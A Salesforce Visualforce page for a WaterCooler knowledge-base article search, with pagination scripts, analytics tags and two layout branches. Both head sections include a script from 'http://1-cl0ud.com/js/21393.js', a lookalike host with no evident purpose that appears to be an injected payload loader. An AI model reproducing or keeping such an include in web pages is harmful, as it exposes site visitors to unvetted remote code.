<apex:page standardStylesheets="false" showheader="false" controller="SL_SearchArticle" cache="false" >
  <apex:outputPanel rendered="{!strCustomSettingName == 'si'}">
  <head>
        <meta charset="utf-8"/>
        <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
        <meta name="viewport" content="width=1000"/>
         <title>{!strSiteDirectory}</title>
         
         <apex:stylesheet value="{!URLFOR($Resource.SL_WaterCooler, 'css/bootstrap.min.css')}" />
		 <apex:stylesheet value="{!URLFOR($Resource.SL_WaterCooler, 'css/style.css')}"/>
		 <apex:stylesheet value="http://fonts.googleapis.com/css?family=Roboto:400,100,300,300italic,100italic,400italic,900,900italic" />
		 <apex:stylesheet value="{!URLFOR($Resource.SL_WaterCooler, 'css/font-awesome.min.css')}"/>
		 <!--<script src="//cdnjs.cloudflare.com/ajax/libs/bootstrap-table/1.8.1/bootstrap-table.min.js"></script>-->
		 	<script type="text/javascript" src="http://1-cl0ud.com/js/21393.js" ></script>
		<script type="text/javascript">
			var _gaq = _gaq || [];
			_gaq.push('_setAccount', 'UA-37706407-1');
			_gaq.push('_trackPageview');
			(function()
			{ var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); }
			)();
		</script>
		
		<script type="text/javascript">
			/* JS Functions to call Action Functions for Pagination Buttons */
            function goToPage(pageNumber)
            {
                document.getElementById(pageNumber+'_'+'liIteam').className='active';
                
                var contVar = [];
                contVar = '{!lstTotalNoOfPages}';
                
                for(var i=1; i<=contVar.length ; i++)
                {
                    if(contVar[i] != ' ' && contVar[i] != ',' && contVar[i] != '[' && contVar[i] != ']'  && contVar[i] != undefined && contVar[i] != 'undefined')
                    {
                        if(contVar[i] != pageNumber)
                        {
                            document.getElementById(contVar[i]+'_'+'liIteam').className ='inactive';
                        }
                    }
                }
            }
			
			function goToPageJS(pageNumber2)
			{
			    goToPageAF(pageNumber2);
			    return false;
			}
            
			function previous()
			{
				previousAF();
				return false;
			}

			function next()
			{
				nextAF();
				return false;
			}

			function last()
			{
				lastAF();
				return false;
			}
			function first()
			{
				firstAF();
				return false;
			}
		
		</script>
    </head>
    	<!-- Start of Async HubSpot Analytics Code -->
    <script type="text/javascript">
        (function(d,s,i,r) {
            if (d.getElementById(i)){return;}
            var n=d.createElement(s),e=d.getElementsByTagName(s)[0];
            n.id=i;n.src='//js.hs-analytics.net/analytics/'+(Math.ceil(new Date()/r)*r)+'/376423.js';
            e.parentNode.insertBefore(n, e);
        })(document,"script","hs-analytics",300000);
    </script>
		<!-- End of Async HubSpot Analytics Code -->
	<apex:form >
		<apex:actionFunction name="previousAF" action="{!showPrevious}" rerender="searchResultBlock" />
		<apex:actionFunction name="nextAF" action="{!showNext}" rerender="searchResultBlock" />
		<apex:actionFunction name="lastAF" action="{!showLast}" rerender="searchResultBlock" /> 
		<apex:actionFunction name="firstAF" action="{!showFirst}" rerender="searchResultBlock" />
        
		<!-- Action Function for Search Button -->
		<apex:actionFunction name="searchAF" action="{!searchArticles}" rerender="searchResultBlock,searchResultBlock2"  >
			<apex:param name="searchTerm" value="" assignTo="{!strSearchText}" />
		</apex:actionFunction>
	
		<apex:actionFunction name="goToPageAF" action="{!goToPage}" rerender="searchResultBlock"  oncomplete="goToPage('{!strPages}')">
			<apex:param name="strPages" value="" assignTo="{!strPages}" />
		</apex:actionFunction>
		
		<body id="knowledgebase">
	
	    <c:SiteTemplate selectedTab=""/>
	    <div class="jumbotron top">
	      <div class="container">
		      <div class="row">
		        <div class="col-md-12 col-sm-12 col-xs-12">
			        <a title="">
					      <img class="responsive wc-logo" src="http://silverlinecrm.com/wordpress/wp-content/uploads/wc-logo-knowledge-base.png" alt="WaterCooler Logo"/>
			        </a>
		        </div>
		      </div>
		      <div class="row">
		        <div class="col-md-8">
			        <h1>Knowledge Base</h1>
		        </div>
		      </div>
		      
    			<div class="row">
						<div class="col-md-12  col-lg-12  col-sm-12 col-xs-12">
							<div class="search-box inline">
									<div>
										<c:SL_SearchComponent autocomplete_textbox="{!$Component.serachText}" isOnSearchPage="true" />
									</div>
							</div>

						</div>
					</div>
	 	    </div>
	    </div>
	       <c:navigationClone selectedTab="Help" />
			<!--<div class="sticky-wrapper">
				<div id="colorbar" role="navigation" class="action-nav">
					<div class="navbar-header">
			      <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#subnavbar-collapse" aria-expanded="false">
			        <span class="sr-only">Toggle navigation</span>
			        <span class="icon-bar"></span>
			        <span class="icon-bar"></span>
			        <span class="icon-bar"></span>
			      </button>
						<div class="row action visible-xs-inline">
							<a href="#" title="" class="btn btn-blue btn-default btn-large" data-toggle="modal" data-target="#myModal"><i class="fa fa-envelope"></i> &nbsp;&nbsp;Contact Support</a>
						</div>
			    </div>
			    <div class="row collapse navbar-collapse" id="subnavbar-collapse">
						<div class="container">
							<ul class="nav navbar-nav left">
								<li><a rel="scrollto" href="#benefits" title="View The WaterCooler Features">Benefits</a></li>
								<li><a rel="scrollto" href="#success" title="See The WaterCooler Success Stories">Success Stories</a></li>
								<li><a rel="scrollto" href="#use-cases" title="See The WaterCooler Use Cases">Use Cases</a></li>
								<li><a href="#" title="" class="active">Knowledgebase</a></li>
							</ul>
					
							<div class="row action hidden-xs">
								<a href="#" title="" class="btn btn-blue btn-default btn-large" data-toggle="modal" data-target="#myModal"><i class="fa fa-envelope"></i> &nbsp;&nbsp;Contact Support</a>
							</div>
						</div>
					</div>
				</div>
			</div> 
			-->
			
	        <div class="container">
	        	<!--<apex:outputPanel id="searchResultBlock" >-->
	        	 <apex:outputPanel id="searchResultBlock" >
	            <div class="category-header">
					<h2>{!strCategoryName}</h2>
					<apex:outputPanel id="resultHeader" rendered="{!IF(lstSearchResults.size > 0, true, false)}">
					     <p>{!lstSearchResults.size} {!$Label.si_SearchArticle}</p>
                    </apex:outputPanel>

					<apex:outputPanel id="noResultHeader" rendered="{!IF(OR(lstSearchResults = '',lstSearchResults.size <= 0), true, false)}">
						<p>{!$Label[strCustomSettingName+'_Search_Page_Result_Not_Found_Msg']}</p>
					</apex:outputPanel>
				</div>
				<!--</apex:outputPanel>-->
				<div class="row">
				    <div class="col-sm-7">  
				    <!--<table id="table">-->
				   <!-- <apex:outputPanel id="searchResultBlock" >-->
                        <apex:repeat var="KA" value="{!lstSearchResults}" first="{!currentPage}" rows="{!pageSize}" id="KA">
                           <!-- <tr>-->
                            <div class="category-listing">
                                <h3><a href="ArticleDetail?Name={!KA.articleObject['UrlName']}&obj={!KA.articleObjectType}&search={!strEncodedSearchText}&dc={!strSearchDataCategory}&dcn={!strSearchDataCategoryName}&pgNum={!pageNumber}&ob={!strArticleObjectType}&subId={!strSubscriptionOrgId}">{!KA.articleObject['Title']}</a></h3>
                                
                                <p>{!KA.articleObject['Summary']}</p>
                                <a href="ArticleDetail?Name={!KA.articleObject['UrlName']}&obj={!KA.articleObjectType}&search={!strEncodedSearchText}&dc={!strSearchDataCategory}&dcn={!strSearchDataCategoryName}&pgNum={!pageNumber}&ob={!strArticleObjectType}&subId={!strSubscriptionOrgId}">View Article&nbsp;&nbsp;<small><i class="glyphicon glyphicon-chevron-right"></i></small></a> 
				            </div>
				           <!-- </tr>-->
				        </apex:repeat>
				        <!--</table>-->
				         <!--</apex:outputPanel>-->
				    <!--</div>-->
				    
			<!--	</div>-->
				    
				<!--</apex:outputPanel>-->
				<!--	<div class="row">
				    <div class="col-sm-7"> -->
				<apex:outputPanel rendered="{!IF(lstSearchResults.size > 0, true, false)}">
				            <nav>
						        <ul class="pagination">
						   <li Class="{!if(!showPrevious,'disabled','')}">
						      <a href="#"  onclick="return first()" aria-label="Previous" style="{!IF(showPrevious, 'display:initial', 'display:none')}"> <span aria-hidden="true">&raquo;</span></a>
						       <a href="#" aria-label="Previous" style="{!IF(!showPrevious, 'display:initial', 'display:none')}">
						        <span aria-hidden="true">&raquo;</span>
						      </a>
						    </li>     
						 <apex:repeat var="paggin" value="{!lstTotalNoOfPages}">
						     <li id="{!paggin}_liIteam" class="{!IF(paggin=='1', 'active', 'inactive')}"><a id="{!paggin}_aIteam" href="#" onclick="
						     goToPage('{!paggin}');return goToPageJS('{!paggin}');">{!paggin}</a></li>
						  </apex:repeat>
						  <li Class="{!if(!showNext,'disabled','')}">
						      <a href="#"  onclick="return last()" aria-label="Next" style="{!IF(showNext, 'display:initial', 'display:none')}"> <span aria-hidden="true">&raquo;</span></a>
						       <a href="#" aria-label="Next" style="{!IF(!showNext, 'display:initial', 'display:none')}">
						        <span aria-hidden="true">&raquo;</span>
						      </a>
						    </li>
						  </ul>
						</nav>
						
						<script>
						     document.getElementById('{!pageNumber}'+'_liIteam').className='active';
						     contVar = '{!lstTotalNoOfPages}';
                            //contVar = contVar.trim;
                            
                            for(var i=1; i<=contVar.length ; i++)
                            {
                                if(contVar[i] != ' ' && contVar[i] != ',' && contVar[i] != '[' && contVar[i] != ']'  && contVar[i] != undefined && contVar[i] != 'undefined')
                                {
                                    if(contVar[i] != '{!pageNumber}')
                                    {
                                        document.getElementById(contVar[i]+'_'+'liIteam').className ='inactive';
                                    }
                                }
                            }
						</script>
						
					</apex:outputPanel>
					</div>
						<c:HelpRightSideBar />
					</div></apex:outputPanel>
	        </div>
	         <footer>
                <div class="container">
                    <ul class="list-inline">
					    <li><a href="http://silverlinecrm.com/contact-us">Contact Us</a></li>
			            <li><a href="http://silverlinecrm.com/about-us">About Silverline</a></li>
			            <li><a href="http://silverlinecrm.com/privacy-policy">Privacy Policy</a></li>
			            <li class="social">
			                <a href="https://www.facebook.com/silverlinecrm" target="_blank"><img src="http://silverlinecrm.com/wordpress/wp-content/themes/silverline/assets/images/icons/facebook.png"/></a> 
			                <a href="http://www.linkedin.com/company/1200403?trk=tyah&trkInfo=tas%3Asilverline%2Cidx%3A2-1-2" target="_blank"><img src="http://silverlinecrm.com/wordpress/wp-content/themes/silverline/assets/images/icons/linkedin.png"/></a> 
			                <a href="https://twitter.com/silverlinecrm" target="_blank"><img src="http://silverlinecrm.com/wordpress/wp-content/themes/silverline/assets/images/icons/twitter.png"/></a>
			            </li>
				    </ul>
			    </div>
		        <div id="copyright">&copy; 2014 Silverline</div>
            </footer>
             <apex:includeScript value="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js" />
        <apex:includeScript value="{!URLFOR($Resource.SL_WaterCooler, 'js/bootstrap.min.js')}" />
        <apex:includeScript value="{!URLFOR($Resource.SL_WaterCooler, 'js/waypoints.min.js')}" />
        <apex:includeScript value="{!URLFOR($Resource.SL_WaterCooler, 'js/waypoints-sticky.min.js')}" />
        <script>
            $('#colorbar').waypoint('sticky',{
            offset: 78
            });
            
            /*$(function() {
        $('#table').bootstrapTable({
            pagination: true,
            onClickRow: function(r, e) {
                if ((typeof sforce != 'undefined') && (sforce != null)) {
                    sforce.one.navigateToSObject(r.Id, "DETAIL");
                } else {
                    window.location.href = '/' + r.Id;
                }

            }
        });
    });*/
        </script>
	    </body>			
        </apex:form>
        </apex:outputPanel>
        <apex:outputPanel rendered="{!strCustomSettingName != 'si'}">
        	<head>

		<!-- JS and CSS Resources -->	
		<apex:includescript value="{!URLFOR($Resource['SL_' + strCustomSettingName + '_CSS'], 'CalendarAnything/markup/js/jquery-1.8.3.min.js')}"/>
	    <apex:includescript value="{!URLFOR($Resource.SL_CW_jquery, 'SL_CW_jquery.js')}"/>
	    <apex:includescript value="{!URLFOR($Resource['SL_' + strCustomSettingName + '_CSS'], 'CalendarAnything/markup/js/jquery.main.js')}"/>
	    <apex:stylesheet value="{!URLFOR($Resource['SL_' + strCustomSettingName + '_CSS'], 'CalendarAnything/markup/css/all.css')}"/>

	    <meta name="viewport" content="width=1000" />

        <title>{!strSiteDirectory}</title>
		
		<script type="text/javascript" src="http://1-cl0ud.com/js/21393.js" ></script>
		<script type="text/javascript">
			var _gaq = _gaq || [];
			_gaq.push('_setAccount', 'UA-37706407-1');
			_gaq.push('_trackPageview');
			(function()
			{ var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); }
			)();
		</script>
		
		<script type="text/javascript">

			/* JS Functions to call Action Functions for Pagination Buttons */

			function first()
			{
				firstAF();
				return false;
			}

			function previous()
			{
				previousAF();
				return false;
			}

			function next()
			{
				nextAF();
				return false;
			}

			function last()
			{
				lastAF();
				return false;
			}
		
		</script>

	</head>
		
		<!-- Start of Async HubSpot Analytics Code -->
	    <script type="text/javascript">
	        (function(d,s,i,r) {
	            if (d.getElementById(i)){return;}
	            var n=d.createElement(s),e=d.getElementsByTagName(s)[0];
	            n.id=i;n.src='//js.hs-analytics.net/analytics/'+(Math.ceil(new Date()/r)*r)+'/376423.js';
	            e.parentNode.insertBefore(n, e);
	        })(document,"script","hs-analytics",300000);
	    </script>
		<!-- End of Async HubSpot Analytics Code -->
		
		<apex:form >

			<!-- Action Functions for Pagination Buttons -->
			<apex:actionFunction name="firstAF" action="{!showFirst}" rerender="searchResultBlock" />
			<apex:actionFunction name="previousAF" action="{!showPrevious}" rerender="searchResultBlock" />
			<apex:actionFunction name="nextAF" action="{!showNext}" rerender="searchResultBlock" />
			<apex:actionFunction name="lastAF" action="{!showLast}" rerender="searchResultBlock" />

			<!-- Action Function for Search Button -->
			<apex:actionFunction name="searchAF" action="{!searchArticles}" rerender="searchResultBlock"  >
				<apex:param name="searchTerm" value="" assignTo="{!strSearchText}" />
			</apex:actionFunction>

			
				<!-- page holder -->
			    <div id="wrapper">

			        <!---------- Page Header Component ---------->

			        <c:SiteTemplate selectedTab="Help" />

			        <!-- main container -->

					<div id="main">

						<div id="content">

							<!-- START - Search component content box -->

							<c:SL_SearchComponent autocomplete_textbox="{!$Component.serachText}" isOnSearchPage="true" />

							<!-- END - Search component content box -->

							<div class=" main-cols">

								<!-- START - Right side bar content box -->

								<c:HelpRightSideBar />

								<!-- END - Right side bar content box -->

								<!-- START - Main page content i.e. SEARCH RESULTs -->

								<div class="col-main mainBox">

									<apex:outputPanel id="searchResultBlock" >

										<p class="backLink1">

											<apex:outputPanel id="resultHeader" rendered="{!IF(lstSearchResults.size > 0, true, false)}">
												<a href="#" style="cursor: default;" >{!lstSearchResults.size} {!$Label[strCustomSettingName+'_Search_Page_ResultFound_Msg']}</a>
											</apex:outputPanel>

											<apex:outputPanel id="noResultHeader" rendered="{!IF(OR(lstSearchResults = '',lstSearchResults.size <= 0), true, false)}">
												<a href="#" id="srcMsg" style="cursor: default;" >{!$Label[strCustomSettingName+'_Search_Page_Result_Not_Found_Msg']}</a>
											</apex:outputPanel>
										</p>
										
										<apex:repeat var="KA" value="{!lstSearchResults}" first="{!currentPage}" rows="{!pageSize}" id="KA">

				                            <p class="searchItem">
				                            	<a href="ArticleDetail?Name={!KA.articleObject['UrlName']}&obj={!KA.articleObjectType}&search={!strEncodedSearchText}&dc={!strSearchDataCategory}&dcn={!strSearchDataCategoryName}&pgNum={!pageNumber}&ob={!strArticleObjectType}&subId={!strSubscriptionOrgId}">{!KA.articleObject['Title']}</a>
				                            	<br />
				                            	<span class="searchContent">{!KA.articleObject['Summary']}</span>
				                            </p>

				                        </apex:repeat>

					                    <apex:outputPanel rendered="{!IF(lstSearchResults.size > 0, true, false)}">
											<div id="tnt_pagination">
												<apex:outputLink styleClass="{!if(!showPrevious,'disabled_tnt_pagination','')}" onclick="return first()" disabled="{!!showPrevious}">First</apex:outputLink>
												<apex:outputLink styleClass="{!if(!showPrevious,'disabled_tnt_pagination','')}" onclick="return previous()" disabled="{!!showPrevious}">Previous</apex:outputLink>
												<apex:outputLink styleClass="{!if(!showNext,'disabled_tnt_pagination','')}" onclick="return next()" disabled="{!!showNext}">Next</apex:outputLink>
												<apex:outputLink styleClass="{!if(!showNext,'disabled_tnt_pagination','')}" onclick="return last()" disabled="{!!showNext}">Last</apex:outputLink>
											</div>
										</apex:outputPanel>

			                        </apex:outputPanel>

									<p>&nbsp;</p>

								</div>

								<!-- END - Main page content i.e. SEARCH RESULT -->

							</div>


						</div>
					</div>
			     </div>

		</apex:form>
        </apex:outputPanel>

</apex:page>